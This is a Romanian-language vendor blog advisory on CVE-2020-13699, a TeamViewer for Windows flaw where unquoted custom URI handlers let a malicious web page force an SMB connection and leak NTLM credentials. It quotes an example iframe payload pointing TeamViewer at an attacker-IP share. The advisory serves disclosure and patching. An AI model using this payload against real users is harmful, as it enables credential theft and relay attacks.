Vulnerabilitatea cu risc ridicat din TeamViewer ar putea fi exploatată pentru a sparge parola utilizatorilor – SecPod Blog
A fost descoperită o vulnerabilitate cu risc ridicat în TeamViewer pentru Windows. Aceasta este urmărită ca „CVE-2020-13699”, cu un scor de bază CVSS de „8,8”, care ar putea fi exploatată de atacatori de la distanță pentru a sparge parola utilizatorilor și, ulterior, să conducă la exploatarea ulterioară a sistemului.
TeamViewer este o aplicație software pentru control de la distanță, partajare de desktop, întâlniri online, conferințe web și transfer de fișiere între calculatoare, dezvoltată de compania germană TeamViewer GmbH. TeamViewer este disponibilă pentru sistemele de operare Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 și BlackBerry. De asemenea, este posibil să se acceseze un sistem care rulează TeamViewer cu un browser web.
O creștere recentă a utilizării aplicațiilor software de conectivitate de la distanță datorată recentei schimbări de cultură a lucrului de acasă în cadrul pandemiei COVID-19.
(CVE-2020-13699) Detalii despre vulnerabilitate:
- CVE-2020-13699 este un defect de securitate care provine dintr-o cale sau element de căutare necotat. În mod specific, această vulnerabilitate se datorează faptului că aplicația nu își citează corect gestionarii URI personalizați.
- Un utilizator cu o versiune TeamViewer vulnerabilă instalată este păcălit să viziteze un site web creat în mod malițios pentru a exploata această vulnerabilitate.
- Potrivit lui Jeffrey Hofmann, un inginer de securitate de la Praetorian, care a descoperit și dezvăluit vulnerabilitatea „Un atacator ar putea încorpora un iframe malițios într-un site web cu un URL modificat (iframe src=’teamviewer10: -play \\attacker-IP\share\fake.tvs’) care ar lansa clientul TeamViewer Windows desktop și l-ar forța să deschidă un share SMB de la distanță.”
- Windows va efectua autentificarea NTLM la deschiderea share-ului SMB. Această cerere poate fi retransmisă, adică permite unui atacator să captureze o autentificare și să o trimită către un alt server, acordându-i posibilitatea de a efectua operațiuni pe serverul de la distanță folosind privilegiile utilizatorului autentificat.
- Exploatarea cu succes a acestei vulnerabilități ar putea permite unui atacator de la distanță să lanseze TeamViewer cu parametri arbitrari. Aplicația ar putea fi forțată să retransmită o cerere de autentificare NTLM către sistemul atacatorului, permițând atacuri de tip rainbow table offline și încercări de spargere prin forță brută.
- Aceste atacuri ar putea conduce la o exploatare suplimentară datorită acreditărilor furate în urma exploatării cu succes a vulnerabilității.
Divulgarea a sugerat că nu există dovezi ale exploatării acestei vulnerabilități.
Potrivit CIS, riscul de exploatare este ridicat pentru instituțiile guvernamentale și companiile de dimensiuni medii. În cazul entităților de afaceri mici, riscul este mediu și scăzut pentru utilizatorii casnici.
Impact
Exploatarea vulnerabilităților ar putea permite atacatorilor de la distanță să obțină informații sensibile despre credențiale sau să preia controlul total asupra sistemului afectat.
Produse afectate
TeamViewer Windows Desktop Application before to 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 și 15.8.3.
Soluția
TeamViewer a publicat o actualizare de securitate care abordează CVE-2020-13699.
SanerNow conținutul de securitate pentru detectarea și atenuarea acestei vulnerabilități este publicat. Vă recomandăm insistent să aplicați actualizarea de securitate cu instrucțiunile articolului de asistență publicat.
.